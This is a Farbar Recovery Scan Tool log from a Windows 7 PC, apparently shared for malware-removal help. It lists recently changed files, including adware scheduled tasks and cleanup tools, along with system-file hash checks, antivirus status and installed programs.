2014-03-13 09:03 - 2014-03-01 13:16 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-03-13 09:03 - 2014-03-01 13:14 - 04244480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-03-13 09:03 - 2014-03-01 13:10 - 02334208 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-03-13 09:03 - 2014-03-01 13:03 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-03-13 09:03 - 2014-03-01 13:00 - 01964032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-03-13 09:03 - 2014-03-01 12:57 - 11266048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-03-13 09:03 - 2014-03-01 12:38 - 01393664 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-03-13 09:03 - 2014-03-01 12:32 - 01820160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-03-13 09:03 - 2014-03-01 12:27 - 01156096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-03-13 09:03 - 2014-03-01 12:25 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-03-13 09:03 - 2014-03-01 12:25 - 00703488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-03-13 09:03 - 2014-02-07 11:23 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-03-13 09:03 - 2014-01-29 12:32 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2014-03-13 09:03 - 2014-01-29 12:06 - 00381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2014-03-13 09:03 - 2014-01-28 12:32 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2014-03-13 08:58 - 2014-02-04 12:32 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-03-13 08:58 - 2014-02-04 12:32 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-03-13 08:58 - 2014-02-04 12:04 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-03-13 08:58 - 2014-02-04 12:04 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-03-10 10:00 - 2014-03-10 10:00 - 00002762 _____ () C:\Windows\System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013
2014-03-10 09:02 - 2014-03-10 09:02 - 00001119 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-10 09:02 - 2014-03-10 09:02 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\Malwarebytes
2014-03-10 09:00 - 2014-03-10 09:00 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\Paulette\Downloads\mbam-setup-1.75.0.1300.exe
2014-03-10 08:56 - 2014-03-10 08:56 - 00000000 ____D () C:\Qoobox
2014-03-10 08:55 - 2014-03-10 08:55 - 00000000 ____D () C:\Windows\erdnt
2014-03-10 08:00 - 2014-03-10 13:20 - 00000000 ____D () C:\Users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-10 07:59 - 2014-03-10 07:59 - 01295200 _____ (LogMeIn, Inc.) C:\Users\Paulette\Downloads\Support-LogMeInRescue.exe
2014-03-09 13:34 - 2014-03-09 13:34 - 00003694 _____ () C:\Windows\System32\Tasks\Adobe online update program
2014-03-09 13:27 - 2014-03-09 13:27 - 00002235 _____ () C:\Users\Public\Desktop\AVG 1-Click Maintenance.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00002209 _____ () C:\Users\Public\Desktop\AVG PC TuneUp 2014.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVG
2014-03-09 13:27 - 2013-12-18 09:38 - 00040248 _____ (AVG) C:\Windows\system32\TURegOpt.exe
2014-03-09 13:27 - 2013-12-18 09:38 - 00029496 _____ (AVG) C:\Windows\system32\authuitu.dll
2014-03-09 13:27 - 2013-12-18 09:38 - 00025400 _____ (AVG) C:\Windows\SysWOW64\authuitu.dll
2014-03-09 13:25 - 2014-03-09 13:33 - 00000000 __SHD () C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-03-09 13:25 - 2014-03-09 13:29 - 00000000 ____D () C:\ProgramData\AVG
2014-03-09 13:22 - 2014-03-09 13:24 - 78353832 _____ (AVG) C:\Users\Paulette\Downloads\avg_tuht_stf_all_2014_295.exe
2014-02-28 10:28 - 2014-03-16 07:29 - 00000000 ____D () C:\Program Files (x86)\MediaViewV1
2014-02-25 09:17 - 2014-02-25 09:17 - 00000000 ____D () C:\Program Files (x86)\MediaViewerV1

==================== One Month Modified Files and Folders =======

2014-03-19 00:42 - 2014-03-19 00:41 - 00015656 _____ () C:\Users\Paulette\Desktop\FRST.txt
2014-03-19 00:41 - 2014-03-19 00:41 - 00000000 ____D () C:\FRST
2014-03-19 00:40 - 2014-03-19 00:39 - 02157056 _____ (Farbar) C:\Users\Paulette\Desktop\FRST64.exe
2014-03-19 00:37 - 2014-03-19 00:37 - 01145856 _____ (Farbar) C:\Users\Paulette\Desktop\FRST.exe
2014-03-19 00:30 - 2009-07-14 14:45 - 00015792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-03-19 00:30 - 2009-07-14 14:45 - 00015792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-03-19 00:26 - 2014-01-20 17:04 - 01958934 _____ () C:\Windows\WindowsUpdate.log
2014-03-19 00:23 - 2014-03-17 11:12 - 00000480 _____ () C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job
2014-03-19 00:23 - 2014-01-20 19:40 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-03-19 00:22 - 2014-03-17 11:40 - 00000224 _____ () C:\Windows\setupact.log
2014-03-19 00:22 - 2009-07-14 15:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-03-19 00:00 - 2014-01-20 19:40 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-03-18 23:54 - 2014-01-20 17:22 - 00000000 ____D () C:\Users\Paulette\AppData\Local\VirtualStore
2014-03-18 23:36 - 2014-01-20 19:52 - 00000000 ____D () C:\ProgramData\MFAData
2014-03-18 23:32 - 2014-03-16 15:21 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-03-17 13:50 - 2014-01-20 20:10 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\SoftGrid Client
2014-03-17 13:25 - 2014-03-16 15:22 - 00002192 _____ () C:\Users\Public\Desktop\avast! Premier.lnk
2014-03-17 13:21 - 2014-03-17 13:21 - 00001984 _____ () C:\Users\Paulette\Desktop\JRT.txt
2014-03-17 13:17 - 2014-02-06 19:45 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-03-17 13:09 - 2014-03-17 13:09 - 00000000 ____D () C:\Windows\ERUNT
2014-03-17 13:02 - 2014-03-17 13:02 - 01037734 _____ (Thisisu) C:\Users\Paulette\Downloads\JRT.exe
2014-03-17 12:43 - 2014-03-17 12:39 - 00000000 ____D () C:\AdwCleaner
2014-03-17 12:39 - 2014-03-17 12:37 - 01950720 _____ () C:\Users\Paulette\Downloads\AdwCleaner.exe
2014-03-17 11:40 - 2014-03-17 11:40 - 00028918 _____ () C:\Windows\PFRO.log
2014-03-17 11:40 - 2014-03-17 11:40 - 00000000 _____ () C:\Windows\setuperr.log
2014-03-17 11:40 - 2014-03-17 11:13 - 00000470 _____ () C:\Windows\Tasks\SparkTrust Registration3.job
2014-03-17 11:40 - 2014-03-17 11:12 - 00000651 _____ () C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job
2014-03-17 11:40 - 2014-03-17 11:12 - 00000428 _____ () C:\Windows\Tasks\SparkTrust Update Version3.job
2014-03-17 11:37 - 2014-02-15 16:19 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-03-17 11:37 - 2014-01-27 10:39 - 00000000 ____D () C:\Program Files (x86)\ABBYY FineReader 9.0 Sprint
2014-03-17 11:37 - 2014-01-20 19:44 - 00000000 ____D () C:\Program Files (x86)\Mozilla Thunderbird
2014-03-17 11:37 - 2014-01-20 19:11 - 00000000 ____D () C:\Users\Paulette\Documents\PcSetup
2014-03-17 11:37 - 2010-01-25 01:13 - 00000000 ____D () C:\Windows\Panther
2014-03-17 11:37 - 2010-01-24 06:54 - 00000000 ____D () C:\Program Files (x86)\HP Games
2014-03-17 11:13 - 2014-03-17 11:13 - 00003140 _____ () C:\Windows\System32\Tasks\SparkTrust Registration3
2014-03-17 11:12 - 2014-03-17 11:12 - 00004096 _____ () C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E
2014-03-17 11:12 - 2014-03-17 11:12 - 00003248 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3
2014-03-17 11:12 - 2014-03-17 11:12 - 00002912 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task
2014-03-16 15:22 - 2014-03-16 15:22 - 00440672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswndisflt.sys
2014-03-16 15:22 - 2014-03-16 15:22 - 00002018 _____ () C:\Users\Public\Desktop\avast! SafeZone.lnk
2014-03-16 15:19 - 2014-03-16 15:19 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVAST Software
2014-03-16 09:06 - 2014-03-16 09:06 - 01038072 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00421704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00334136 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-03-16 09:06 - 2014-03-16 09:06 - 00207904 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00092544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00080184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00078648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-03-16 09:06 - 2014-03-16 09:06 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-03-16 09:05 - 2014-03-16 09:05 - 00000000 ____D () C:\Program Files\AVAST Software
2014-03-16 09:02 - 2014-03-16 09:02 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-03-16 08:59 - 2014-03-16 08:49 - 123721288 _____ (AVAST Software) C:\Users\Paulette\Downloads\avast_premier_antivirus_setup.exe
2014-03-16 08:49 - 2014-03-16 08:49 - 00001727 _____ () C:\Users\Paulette\Downloads\License(1).avastlic
2014-03-16 07:29 - 2014-02-28 10:28 - 00000000 ____D () C:\Program Files (x86)\MediaViewV1
2014-03-16 07:29 - 2014-01-20 19:53 - 00000000 ____D () C:\ProgramData\AVG2014
2014-03-13 19:41 - 2009-07-14 14:45 - 00430960 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-03-13 19:40 - 2014-01-20 19:41 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-03-13 19:40 - 2014-01-20 19:41 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-03-13 07:17 - 2014-02-06 19:45 - 00692616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-03-13 07:17 - 2014-02-06 19:45 - 00071048 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-03-13 07:17 - 2014-02-06 19:45 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-03-10 13:20 - 2014-03-10 08:00 - 00000000 ____D () C:\Users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-10 10:27 - 2014-01-20 19:11 - 05187267 _____ (Swearware) C:\Users\Paulette\Downloads\ComboFix.exe
2014-03-10 10:00 - 2014-03-10 10:00 - 00002762 _____ () C:\Windows\System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013
2014-03-10 09:02 - 2014-03-10 09:02 - 00001119 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-10 09:02 - 2014-03-10 09:02 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\Malwarebytes
2014-03-10 09:02 - 2014-01-20 19:49 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-03-10 09:00 - 2014-03-10 09:00 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\Paulette\Downloads\mbam-setup-1.75.0.1300.exe
2014-03-10 08:56 - 2014-03-10 08:56 - 00000000 ____D () C:\Qoobox
2014-03-10 08:55 - 2014-03-10 08:55 - 00000000 ____D () C:\Windows\erdnt
2014-03-10 07:59 - 2014-03-10 07:59 - 01295200 _____ (LogMeIn, Inc.) C:\Users\Paulette\Downloads\Support-LogMeInRescue.exe
2014-03-09 13:34 - 2014-03-09 13:34 - 00003694 _____ () C:\Windows\System32\Tasks\Adobe online update program
2014-03-09 13:33 - 2014-03-09 13:25 - 00000000 __SHD () C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-03-09 13:33 - 2014-02-06 07:20 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\HpUpdate
2014-03-09 13:33 - 2010-01-24 06:43 - 00000000 ____D () C:\ProgramData\{44AFD825-9603-4521-9447-A6E1C5CA2F3D}
2014-03-09 13:33 - 2010-01-24 06:40 - 00000000 ____D () C:\ProgramData\{B3C2C1CD-6B77-4A96-B670-F734AC2A1CBC}
2014-03-09 13:33 - 2010-01-24 06:25 - 00000000 __HDC () C:\ProgramData\{B12D13C3-76FD-479D-AD99-8C6F18156BC9}
2014-03-09 13:29 - 2014-03-09 13:25 - 00000000 ____D () C:\ProgramData\AVG
2014-03-09 13:27 - 2014-03-09 13:27 - 00002235 _____ () C:\Users\Public\Desktop\AVG 1-Click Maintenance.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00002209 _____ () C:\Users\Public\Desktop\AVG PC TuneUp 2014.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVG
2014-03-09 13:26 - 2014-01-20 19:52 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-03-09 13:24 - 2014-03-09 13:22 - 78353832 _____ (AVG) C:\Users\Paulette\Downloads\avg_tuht_stf_all_2014_295.exe
2014-03-01 16:05 - 2014-03-13 09:03 - 23133696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-03-01 15:17 - 2014-03-13 09:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-03-01 15:16 - 2014-03-13 09:03 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-03-01 14:58 - 2014-03-13 09:03 - 02765824 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-03-01 14:52 - 2014-03-13 09:03 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-03-01 14:51 - 2014-03-13 09:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-03-01 14:42 - 2014-03-13 09:03 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-03-01 14:40 - 2014-03-13 09:03 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-03-01 14:37 - 2014-03-13 09:03 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-03-01 14:33 - 2014-03-13 09:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-03-01 14:33 - 2014-03-13 09:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-03-01 14:32 - 2014-03-13 09:03 - 00708608 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-03-01 14:30 - 2014-03-13 09:03 - 17074688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-03-01 14:23 - 2014-03-13 09:03 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-03-01 14:17 - 2014-03-13 09:03 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-03-01 14:11 - 2014-03-13 09:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-03-01 14:02 - 2014-03-13 09:03 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-03-01 13:54 - 2014-03-13 09:03 - 05768704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-03-01 13:52 - 2014-03-13 09:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-03-01 13:51 - 2014-03-13 09:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-03-01 13:47 - 2014-03-13 09:03 - 02168320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-03-01 13:43 - 2014-03-13 09:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-03-01 13:43 - 2014-03-13 09:03 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-03-01 13:42 - 2014-03-13 09:03 - 00627200 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-03-01 13:40 - 2014-03-13 09:03 - 00440832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-03-01 13:38 - 2014-03-13 09:03 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-03-01 13:37 - 2014-03-13 09:03 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-03-01 13:35 - 2014-03-13 09:03 - 02041856 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-03-01 13:18 - 2014-03-13 09:03 - 13051904 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-03-01 13:16 - 2014-03-13 09:03 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-03-01 13:14 - 2014-03-13 09:03 - 04244480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-03-01 13:10 - 2014-03-13 09:03 - 02334208 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-03-01 13:03 - 2014-03-13 09:03 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-03-01 13:00 - 2014-03-13 09:03 - 01964032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-03-01 12:57 - 2014-03-13 09:03 - 11266048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-03-01 12:38 - 2014-03-13 09:03 - 01393664 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-03-01 12:32 - 2014-03-13 09:03 - 01820160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-03-01 12:27 - 2014-03-13 09:03 - 01156096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-03-01 12:25 - 2014-03-13 09:03 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-03-01 12:25 - 2014-03-13 09:03 - 00703488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-02-28 11:06 - 2014-01-20 19:47 - 00000000 ____D () C:\Users\Paulette\AppData\Local\Paint.NET
2014-02-28 10:28 - 2014-02-11 13:05 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-02-25 09:17 - 2014-02-25 09:17 - 00000000 ____D () C:\Program Files (x86)\MediaViewerV1
2014-02-20 20:18 - 2009-07-14 15:13 - 00782940 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-02-20 19:26 - 2009-07-14 13:20 - 00000000 ____D () C:\Windows\rescache
2014-02-20 14:34 - 2014-02-15 16:18 - 00000000 ____D () C:\ProgramData\PsdChheckeer
2014-02-20 14:34 - 2014-02-15 16:18 - 00000000 ____D () C:\ProgramData\deeal4meu
2014-02-19 17:35 - 2014-01-20 19:39 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-02-19 15:26 - 2014-01-20 21:21 - 00000000 ____D () C:\Windows\system32\MRT
2014-02-19 15:23 - 2014-01-20 21:20 - 88567024 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Some content of TEMP:
====================
C:\Users\Paulette\AppData\Local\Temp\Quarantine.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-03-16 18:36

==================== End Of Log ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-03-2014
Ran by Paulette at 2014-03-19 00:42:28
Running from C:\Users\Paulette\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AV: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Enabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}

==================== Installed Programs ======================

ABBYY FineReader 9.0 Sprint (HKLM-x32\...\ABBYY FineReader 9.0 Sprint) (Version: 9.01.506.5829 - ABBYY)
ABBYY FineReader 9.0 Sprint (x32 Version: 9.01.506.5829 - ABBYY) Hidden
Activation Assistant for the 2007 Microsoft Office suites (x32 Version: 1.0.1 - Microsoft Corporation) Hidden
ActiveCheck component for HP Active Support Library (x32 Version: 3.0.0.2 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 4.0.0.1390 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.7.148 - Adobe Systems, Inc.)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Install Manager (HKLM\...\{5A569CBA-9BE4-EAB0-9B43-468CEA2323B7}) (Version: 3.0.741.0 - ATI Technologies, Inc.)
avast! Premier (HKLM-x32\...\Avast) (Version: 9.0.2013 - Avast Software)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4259 - AVG Technologies)
AVG 2014 (Version: 14.0.3722 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4259 - AVG Technologies) Hidden
AVG PC TuneUp 2014 (en-US) (x32 Version: 14.0.1001.295 - AVG) Hidden
AVG PC TuneUp 2014 (HKLM-x32\...\AVG PC TuneUp) (Version: 14.0.1001.295 - AVG)
AVG PC TuneUp 2014 (x32 Version: 14.0.1001.295 - AVG) Hidden
Bing Bar (HKLM-x32\...\{B4089055-D468-45A4-A6BA-5A138DD715FC}) (Version: 7.0.850.0 - Microsoft Corporation)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center HydraVision Full (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2009.0908.2225.38429 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Czech (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Danish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Dutch (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help English (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Finnish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help French (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help German (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Greek (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Italian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Japanese (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Korean (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Polish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Russian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Spanish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Swedish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Thai (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Turkish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
ccc-core-static (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
ccc-utility64 (Version: 2009.0908.2225.38429 - ATI) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - CutePDF.com)
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.2115 - CyberLink Corp.)
CyberLink DVD Suite Deluxe (x32 Version: 7.0.2115 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
Epson Easy Photo Print 2 (HKLM-x32\...\{4FB984CB-4CE4-4104-A554-D04CEFE3D690}) (Version: 2.2.3.0 - SEIKO EPSON CORPORATION)
